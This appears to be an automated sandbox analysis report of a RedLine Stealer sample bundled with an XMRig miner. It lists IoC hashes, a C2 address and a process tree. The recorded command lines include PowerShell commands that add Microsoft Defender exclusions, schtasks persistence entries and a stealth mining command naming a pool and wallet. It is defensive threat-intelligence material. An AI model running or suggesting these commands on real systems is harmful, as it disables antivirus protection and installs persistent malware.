Analysis
  max time kernel: 149s
  max time network: 148s
  platform: windows10_x64
  resource: win10-en-20210920
  submitted: 26-10-2021 15:36
Static task: static1
Behavioral task: behavioral1
  Sample: Software updated by Dylox.exe
  Resource: win7-en-20210920
General
  Target: Software updated by Dylox.exe
  Size: 3.2MB
  MD5: 6f78118b606c3c7c9bad1a9e0671cda8
  SHA1: 00abbc6a45d7009d8e166794289b39d0bb709ba5
  SHA256: 7be5baa4d9a45af1e6f15fdf6600537ed78e1694f9daa37741b5e8c3e58d7005
  SHA512: 77d474c0a67754e7f71ee1c932cd4f21bcbd1f94472ffd9c21cbe2c6242f5fa07f5fede82255b9037cff87fbde614225105db3b6a55be560dfc10ac74149d916
Malware Config
Extracted
  Family: redline
  Botnet: Youtube
  C2: 185.203.240.16:1249
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 3 IoCs
Processes:
  Resource                                                                      YARA rule
  behavioral2/memory/3272-140-0x0000000000400000-0x0000000000420000-memory.dmp  family_redline
  behavioral2/memory/3272-141-0x0000000000418D32-mapping.dmp                    family_redline
  behavioral2/memory/3272-150-0x0000000005680000-0x0000000005C86000-memory.dmp  family_redline
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
XMRig Miner Payload 2 IoCs
Processes:
  Resource                                                                     YARA rule
  behavioral2/memory/988-557-0x000000014030F3F8-mapping.dmp                    xmrig
  behavioral2/memory/988-566-0x0000000140000000-0x0000000140786000-memory.dmp  xmrig
-
Downloads MZ/PE file
-
Executes dropped EXE 8 IoCs
Processes:
  PID   Process
  692   Datafile32.exe
  3012  Datafile64.exe
  2296  Server32.exe
  3272  Server32.exe
  316   services32.exe
  596   services64.exe
  3764  sihost32.exe
  2280  sihost64.exe
-
Checks BIOS information in registry 2 TTPs 6 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
  Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion (Datafile64.exe)
  Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion (services64.exe)
  Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion (services64.exe)
  Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion (Software updated by Dylox.exe)
  Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion (Software updated by Dylox.exe)
  Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion (Datafile64.exe)
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
  Resource                                                                      YARA rule
  behavioral2/memory/3336-117-0x0000000000E50000-0x0000000000E51000-memory.dmp  themida
  C:\Users\Admin\AppData\Local\Temp\Datafile64.exe                              themida
  C:\Users\Admin\AppData\Local\Temp\Datafile64.exe                              themida
  behavioral2/memory/3012-131-0x0000000000400000-0x0000000000EAE000-memory.dmp  themida
  C:\Windows\System32\services64.exe                                            themida
  C:\Windows\system32\services64.exe                                            themida
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
  Key value queried: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA (Software updated by Dylox.exe)
  Key value queried: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA (Datafile64.exe)
  Key value queried: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA (services64.exe)
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Drops file in System32 directory 4 IoCs
Processes:
  File created: C:\Windows\system32\services64.exe (conhost.exe)
  File opened for modification: C:\Windows\system32\services64.exe (conhost.exe)
  File created: C:\Windows\system32\Microsoft\Libs\sihost64.exe (conhost.exe)
  File created: C:\Windows\system32\Microsoft\Libs\WR64.sys (conhost.exe)
-
Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
Processes:
  PID   Process
  3336  Software updated by Dylox.exe
  3012  Datafile64.exe
  596   services64.exe
-
Suspicious use of SetThreadContext 2 IoCs
Processes:
  PID 2296 (Server32.exe) set thread context of PID 3272 (Server32.exe)
  PID 3500 (conhost.exe) set thread context of PID 988 (nslookup.exe)
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
  PID   Process
  2968  schtasks.exe
  3232  schtasks.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
  PID   Process
  2216  conhost.exe
  2028  powershell.exe (3 entries)
  3272  Server32.exe
  752   powershell.exe (3 entries)
  876   conhost.exe
  3456  powershell.exe (3 entries)
  1164  powershell.exe (3 entries)
  3128  conhost.exe (2 entries)
  3908  powershell.exe (3 entries)
  3768  powershell.exe (3 entries)
  3500  conhost.exe (2 entries)
  436   powershell.exe (3 entries)
  4048  powershell.exe (3 entries)
  988   nslookup.exe (33 entries)
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
  3336 Software updated by Dylox.exe: SeDebugPrivilege
  2216 conhost.exe: SeDebugPrivilege
  2028 powershell.exe: SeDebugPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
  3272 Server32.exe: SeDebugPrivilege
  752 powershell.exe: SeDebugPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
  876 conhost.exe: SeDebugPrivilege
  3456 powershell.exe: SeDebugPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege (list cut off at the 64-IoC limit)
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
  Source PID (process)                      Target PID (process)        Entries
  3336 (Software updated by Dylox.exe)  ->  692 (Datafile32.exe)        2
  3336 (Software updated by Dylox.exe)  ->  3012 (Datafile64.exe)       2
  3336 (Software updated by Dylox.exe)  ->  2296 (Server32.exe)         3
  2296 (Server32.exe)                   ->  3272 (Server32.exe)         8
  692 (Datafile32.exe)                  ->  2216 (conhost.exe)          3
  2216 (conhost.exe)                    ->  2332 (cmd.exe)              2
  2332 (cmd.exe)                        ->  2028 (powershell.exe)       2
  2216 (conhost.exe)                    ->  2956 (cmd.exe)              2
  2956 (cmd.exe)                        ->  3232 (schtasks.exe)         2
  2332 (cmd.exe)                        ->  752 (powershell.exe)        2
  3012 (Datafile64.exe)                 ->  876 (conhost.exe)           3
  876 (conhost.exe)                     ->  672 (cmd.exe)               2
  672 (cmd.exe)                         ->  3456 (powershell.exe)       2
  876 (conhost.exe)                     ->  1172 (cmd.exe)              2
  1172 (cmd.exe)                        ->  2968 (schtasks.exe)         2
  2216 (conhost.exe)                    ->  1256 (cmd.exe)              2
  1256 (cmd.exe)                        ->  316 (services32.exe)        2
  672 (cmd.exe)                         ->  1164 (powershell.exe)       2
  876 (conhost.exe)                     ->  2008 (cmd.exe)              2
  2008 (cmd.exe)                        ->  596 (services64.exe)        2
  316 (services32.exe)                  ->  3128 (conhost.exe)          3
  3128 (conhost.exe)                    ->  1324 (cmd.exe)              2
  1324 (cmd.exe)                        ->  3908 (powershell.exe)       2
  3128 (conhost.exe)                    ->  3764 (sihost32.exe)         2
  1324 (cmd.exe)                        ->  3768 (powershell.exe)       2
  3764 (sihost32.exe)                   ->  3756 (conhost.exe)          3
  596 (services64.exe)                  ->  3500 (conhost.exe)          1
Processes
-
[depth 1] C:\Users\Admin\AppData\Local\Temp\Software updated by Dylox.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\Software updated by Dylox.exe"
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
[depth 2] C:\Users\Admin\AppData\Local\Temp\Datafile32.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\Datafile32.exe"
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
[depth 3] C:\Windows\System32\conhost.exe
    Command line: "C:\Windows\System32\\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Datafile32.exe"
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
[depth 4] C:\Windows\System32\cmd.exe
    Command line: "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
- Suspicious use of WriteProcessMemory
-
[depth 5] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
[depth 5] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
[depth 4] C:\Windows\System32\cmd.exe
    Command line: "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Users\Admin\services32.exe"
- Suspicious use of WriteProcessMemory
-
[depth 5] C:\Windows\system32\schtasks.exe
    Command line: schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Users\Admin\services32.exe"
- Creates scheduled task(s)
-
[depth 4] C:\Windows\System32\cmd.exe
    Command line: "cmd" cmd /c "C:\Users\Admin\services32.exe"
- Suspicious use of WriteProcessMemory
-
[depth 5] C:\Users\Admin\services32.exe
    Command line: C:\Users\Admin\services32.exe
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
[depth 6] C:\Windows\System32\conhost.exe
    Command line: "C:\Windows\System32\\conhost.exe" "C:\Users\Admin\services32.exe"
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
[depth 7] C:\Windows\System32\cmd.exe
    Command line: "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
- Suspicious use of WriteProcessMemory
-
[depth 8] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
- Suspicious behavior: EnumeratesProcesses
-
[depth 8] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
- Suspicious behavior: EnumeratesProcesses
-
[depth 7] C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe
    Command line: "C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe"
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
[depth 8] C:\Windows\System32\conhost.exe
    Command line: "C:\Windows\System32\\conhost.exe" "/sihost32"
-
[depth 2] C:\Users\Admin\AppData\Local\Temp\Datafile64.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\Datafile64.exe"
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
-
[depth 3] C:\Windows\System32\conhost.exe
    Command line: "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Datafile64.exe"
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
[depth 4] C:\Windows\System32\cmd.exe
    Command line: "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
- Suspicious use of WriteProcessMemory
-
[depth 5] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
[depth 5] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
- Suspicious behavior: EnumeratesProcesses
-
[depth 4] C:\Windows\System32\cmd.exe
    Command line: "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"
- Suspicious use of WriteProcessMemory
-
[depth 5] C:\Windows\system32\schtasks.exe
    Command line: schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"
- Creates scheduled task(s)
-
[depth 4] C:\Windows\System32\cmd.exe
    Command line: "cmd" cmd /c "C:\Windows\system32\services64.exe"
- Suspicious use of WriteProcessMemory
-
[depth 5] C:\Windows\system32\services64.exe
    Command line: C:\Windows\system32\services64.exe
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
-
[depth 6] C:\Windows\System32\conhost.exe
    Command line: "C:\Windows\System32\conhost.exe" "C:\Windows\system32\services64.exe"
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
-
[depth 7] C:\Windows\System32\cmd.exe
    Command line: "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
-
[depth 8] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
- Suspicious behavior: EnumeratesProcesses
-
[depth 8] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
- Suspicious behavior: EnumeratesProcesses
-
[depth 7] C:\Windows\system32\Microsoft\Libs\sihost64.exe
    Command line: "C:\Windows\system32\Microsoft\Libs\sihost64.exe"
- Executes dropped EXE
-
[depth 8] C:\Windows\System32\conhost.exe
    Command line: "C:\Windows\System32\conhost.exe" "/sihost64"
-
[depth 7] C:\Windows\System32\nslookup.exe
    Command line: C:\Windows/System32\nslookup.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=459jfEXyVheN7bBBRJPjJY7jH8nCKFZKdZrBcyPK6q4b7mQnrxN3sSmU8wAcuVvMxP6sumE9x28XSRCgLgyBvT4VENVJbTQ --pass= --cpu-max-threads-hint=50 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6NiP86mD8cW+f6jtmqjmEDLY00XM3Bo2fOksM1LJ6Dgf" --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56GQTOYuXRCBeyb5NYlmdCuiwuvmEFRE3FUoytGa2xDRKVyTGVqBRZ3YvrseaWnYy0OhLuczKVxfo8Wo33kvDh26CIpmy6+bf50YCXxhpkDvay12RqWFwTrEWzJDjMOFSbV4qSudJZDKeejGmt2wAsK4zZ9lj0F0NMeagNs9oiluuddfhHuwfN3JDOsm7vnmpSFDvtwzZIXsZWyWN624JxJsSIqBQxfKrcCnHvRx/k2yLSlvxLvum+3cwztr7Zb0wO7EEWrafJMkNolCTGr1RQK9klv+u1q+LOMUOW+Y1mA+ZjeC+aSi9qmt59ZMlAX42foDzL1w8qyVjl6rfhEF/2bTP0YCyKockkTlSVngGY/1F1T5EOo9DhmrxyNy9y8mJqRKYUIcpgNI5Y4F/BBh3W0pw0+6w6pKB/o2s/ADQ0m7f1mIWwiXrj/GHg6M2kw4tg4mnBGVnha642JDqV8iaYphm4FpsNVwyEeLSXd18Mjr+kd9fvE08ohpB15bbg+6JPSeWISk8CHiep3TzEvyvZ+5XcHZVh1iXXZwlYO+wW5wxnobnzBzuj6f/BZ2txWK+7m4Cgd8mjMym7jJ/vKH1WIDSz05jpx4+wkdqzn3YIdvl2S8Luc4rG0CJXqJOdwbYOBrAey4VzJk8E8cY9tmMr5hpjLcfmu59CVDYVbbFFkb9usjHhXda167RDDOeCiLgdiepY0+9J4GWfDFBWRnvZEIn9njCW10s1hFXvQH+unnKdsaoBPNxSaPInK8O97Hj64jPqNG5qPd3DSjbVR1Cvuh9P29ZftnsNS50GnGtYvaNRBa6443D9MamN7WKSEjXwi5X466GHpLm7tClAm3T8zHW8BSKHq3yutkuduzGC2BYW5rxa17LYp4CzfKufpZJNPcoGIEVeut/xrvPPi+IYNCKrJPaDMN2ZJkpVGMqbuc5AF89xn8L6Lg1pYhaW8QjVZfQAkz7FVC8K667Gg6noLQpAyfd6lW36v4zbzg+fy82rNQmYSI3WMfiYNmvJM8DVc0772kBqEwUisr6ktdw4QlqXJe45Hvgu4yC2Rb6/ntnmOTLJz66c2h/wdUSvS18C67j6jsTvSh7k7avmCdG4sgS/BcyNsYOGIVjgNICoikSjNVrnFxCscaJerBnNPv197mrO4+rRF20+jzVnXKaNAmzbmoa4UjU13WSWasSDIT/HLOYsB6MqZ9V7F19H0MAEc0HL5dHX6oXKZkVMPa+PCA=" --cinit-idle-wait=5 --cinit-idle-cpu=80 --cinit-stealth
- Suspicious behavior: EnumeratesProcesses
-
[depth 2] C:\Users\Admin\AppData\Local\Temp\Server32.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\Server32.exe"
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
[depth 3] C:\Users\Admin\AppData\Local\Temp\Server32.exe
    Command line: C:\Users\Admin\AppData\Local\Temp\Server32.exe
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix (ATT&CK v6)
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log
  MD5: 84f2160705ac9a032c002f966498ef74
  SHA1: e9f3db2e1ad24a4f7e5c203af03bbc07235e704c
  SHA256: 7840ca7ea27e8a24ebc4877774be6013ab4f81d1eb83c121e4c3290ceb532d93
  SHA512: f41c289770d8817ee612e53880d3f6492d50d08fb5104bf76440c2a93539dd25f6f15179b318e67b9202aabbe802941f80ac2dbadfd6ff1081b0d37c33f9da57
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
  MD5: 8592ba100a78835a6b94d5949e13dfc1
  SHA1: 63e901200ab9a57c7dd4c078d7f75dcd3b357020
  SHA256: fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c
  SHA512: 87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Server32.exe.log
  MD5: 41fbed686f5700fc29aaccf83e8ba7fd
  SHA1: 5271bc29538f11e42a3b600c8dc727186e912456
  SHA256: df4e9d012687cdabd15e86bf37be15d6c822e1f50dde530a02468f0006586437
  SHA512: 234b2235c1ced25810a4121c5eabcbf9f269e82c126a1adc363ee34478173f8b462e90eb53f5f11533641663350b90ec1e2360fd805b10c041fab12f4da7a034
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  MD5: a7e2a6dddb6e104575dc1f819e69e1a7
  SHA1: d411332131d28deaa2ff2c9052a2a5ed20edf66f
  SHA256: d6de92e2fdc11428640c5c01599365020b6375d0870e2d422b67d3095892ac6f
  SHA512: d5080c76cd7f6fc600041db15dfa46c5da8744c6479e36015d2615e630b446b696e592ebff8b33ebb1d4b34c505b38b40c17ca064f0287b40205f72e442def8b
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  MD5: c880d2ef46e7d0523f249034e8cfd4fc
  SHA1: 0ccfde8b22ed3e51236b3e9d9d5ce1a38b12c42c
  SHA256: 1f6437039eb1615b68ef3fdab98864c123dcbc570618686e57f581e4d1138692
  SHA512: 06463023da4242f8f3b553ff780157b03b8de053a8753c9367b1fca6991c5fb1922f7a13cac18d4f8ffa2f91a869402107cb897996e5eb909d5b0d39d8cbaa8f
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  MD5: c880d2ef46e7d0523f249034e8cfd4fc
  SHA1: 0ccfde8b22ed3e51236b3e9d9d5ce1a38b12c42c
  SHA256: 1f6437039eb1615b68ef3fdab98864c123dcbc570618686e57f581e4d1138692
  SHA512: 06463023da4242f8f3b553ff780157b03b8de053a8753c9367b1fca6991c5fb1922f7a13cac18d4f8ffa2f91a869402107cb897996e5eb909d5b0d39d8cbaa8f
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  MD5: 17c663f7da483f6593a7c9ed0518ec24
  SHA1: bfc9b3fd4b2ce0954d2f5baabd827515a6d5d4fc
  SHA256: 57aca0169693dee0df928029f72e967c03ce4a650fb2d8aade640c72cb770936
  SHA512: 124e5c600c8af367956a45ce1b310810a13a4496ba97b8dabed6880b71a55f16b4a2225a4d98ad0e44d43fed7c96bef23f16204d2a4779972ddbe9a20dc553a4
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  MD5: 120f9904f15b5f2f3ad5257b33724514
  SHA1: fad45220173217f694ce2040775802aca65c672b
  SHA256: 26d067e7576ea7e80899f1d773276fbe50405089dea796e7f6ae1949bd77542b
  SHA512: d0993b96932eab32ff89f38fc4efd6c87edada6108ecf66fde0a953be4e60416789f854888b05c8c599d853e36f1e8616700c42dc49e6ce34f37943522a98e41
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  MD5: 9fa16af233f7f75cfb96ab54fd977917
  SHA1: 09b914e75666bffc041e5b080a29fe598172ef62
  SHA256: 47f57d4f35f025fdab318035b6d988ffef717e9f8f4231f8e60c739b24886af0
  SHA512: ffb84331e71241221812d14ba3db396f80e80abedd8018c08430a48276a9c23b172e48bc00302f7f0ec4af30c9f7c46dfa7554171c1164b029f0355262f94a92
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  MD5: 4d4f5047898864721994f8fca61d95e2
  SHA1: 89307704905679921b835d2e8c7bc59c929b5cc3
  SHA256: adb54033fa11764c3a54eb7a617255d66c3d8ae9199d58cdebe3bedfb0ea315b
  SHA512: 7e6a199b62cd9f9c011a7d59570a0c8d58351197e84359c27b17943027162d933af11dcf18fc60b5727a46f4bc08ce2a0955462ac4c99137dfeae6555dfdebe1
-
C:\Users\Admin\AppData\Local\Temp\Datafile32.exe
  MD5: 55f246c4f670bddc2e1c6fab66fb9af8
  SHA1: b2737bf54e19008f7230830c987e9cc45ca9dba7
  SHA256: 4c8b5fba12ebb583a444831e1a9759ef724f2d9f37c595e8afb22dbbdabf6bc8
  SHA512: c124240ded2271bc125e88ea6f4cc4625915809a13d66ebf8c32677436f043340b92bc50283835d212c9b40edcea5d458c2663a1d5be5038154b1eb1560628fe
-
C:\Users\Admin\AppData\Local\Temp\Datafile32.exe
  MD5: 55f246c4f670bddc2e1c6fab66fb9af8
  SHA1: b2737bf54e19008f7230830c987e9cc45ca9dba7
  SHA256: 4c8b5fba12ebb583a444831e1a9759ef724f2d9f37c595e8afb22dbbdabf6bc8
  SHA512: c124240ded2271bc125e88ea6f4cc4625915809a13d66ebf8c32677436f043340b92bc50283835d212c9b40edcea5d458c2663a1d5be5038154b1eb1560628fe
-
C:\Users\Admin\AppData\Local\Temp\Datafile64.exe
  MD5: f87ec0d92f1e1c57e281c3b7207264a4
  SHA1: 452ee705af24c36bb2235fc969dd122ede448e7b
  SHA256: 5e5c5c47ac45012b8fe6c40877d111d17b1ae3108fb1bb6ff4ab6e154d256f1c
  SHA512: 8e141c0a78dadafc241a70b1298fd35e223c18eaecceb7ea17bba05c4626e40e5c578757e0510a4db23f99dfb7439371f2ec6fe25252c50f4e3e89b30be37052
-
C:\Users\Admin\AppData\Local\Temp\Datafile64.exe
  MD5: f87ec0d92f1e1c57e281c3b7207264a4
  SHA1: 452ee705af24c36bb2235fc969dd122ede448e7b
  SHA256: 5e5c5c47ac45012b8fe6c40877d111d17b1ae3108fb1bb6ff4ab6e154d256f1c
  SHA512: 8e141c0a78dadafc241a70b1298fd35e223c18eaecceb7ea17bba05c4626e40e5c578757e0510a4db23f99dfb7439371f2ec6fe25252c50f4e3e89b30be37052
-
C:\Users\Admin\AppData\Local\Temp\Server32.exe
  MD5: 7190f3a53c0e5247c2b7ece197acddea
  SHA1: 495b35f241df11b61ddc781ac64e2a3f24d6915b
  SHA256: 646277abb30792f37cece3371b61387555cd16874ba01f59b3e19120467b9ad3
  SHA512: cde3a5d415f51f302d793e1c9fcc11768f3bfea7cf0544fccb3210a3cebc0d3437d3104ae896ebf95dd0bcf3e7d0639ef43a69cdf97015a9591d3b6beb121aad
-
C:\Users\Admin\AppData\Local\Temp\Server32.exe
  MD5: 7190f3a53c0e5247c2b7ece197acddea
  SHA1: 495b35f241df11b61ddc781ac64e2a3f24d6915b
  SHA256: 646277abb30792f37cece3371b61387555cd16874ba01f59b3e19120467b9ad3
  SHA512: cde3a5d415f51f302d793e1c9fcc11768f3bfea7cf0544fccb3210a3cebc0d3437d3104ae896ebf95dd0bcf3e7d0639ef43a69cdf97015a9591d3b6beb121aad
-
C:\Users\Admin\AppData\Local\Temp\Server32.exe
  MD5: 7190f3a53c0e5247c2b7ece197acddea
  SHA1: 495b35f241df11b61ddc781ac64e2a3f24d6915b
  SHA256: 646277abb30792f37cece3371b61387555cd16874ba01f59b3e19120467b9ad3
  SHA512: cde3a5d415f51f302d793e1c9fcc11768f3bfea7cf0544fccb3210a3cebc0d3437d3104ae896ebf95dd0bcf3e7d0639ef43a69cdf97015a9591d3b6beb121aad
-
C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe
  MD5: a48e4ecd100871e98f3b6128f9b37187
  SHA1: 8adf645a05d8ede551aadaaf51a37a47071497b9
  SHA256: b141d0c63cfd6c373f4721eba43014c7ce9e1d3b10aabcefe17750abb9b55283
  SHA512: bd481ddabcce4b9a1cbc95f0067058937effde93cc02c69785fc80ecdc99417753cf1696c1a1e337578256e98763e7e975845fd6aca71d4c3610ddd7eb20cda1
-
C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe
  MD5: a48e4ecd100871e98f3b6128f9b37187
  SHA1: 8adf645a05d8ede551aadaaf51a37a47071497b9
  SHA256: b141d0c63cfd6c373f4721eba43014c7ce9e1d3b10aabcefe17750abb9b55283
  SHA512: bd481ddabcce4b9a1cbc95f0067058937effde93cc02c69785fc80ecdc99417753cf1696c1a1e337578256e98763e7e975845fd6aca71d4c3610ddd7eb20cda1
-
C:\Users\Admin\services32.exe
  MD5: 55f246c4f670bddc2e1c6fab66fb9af8
  SHA1: b2737bf54e19008f7230830c987e9cc45ca9dba7
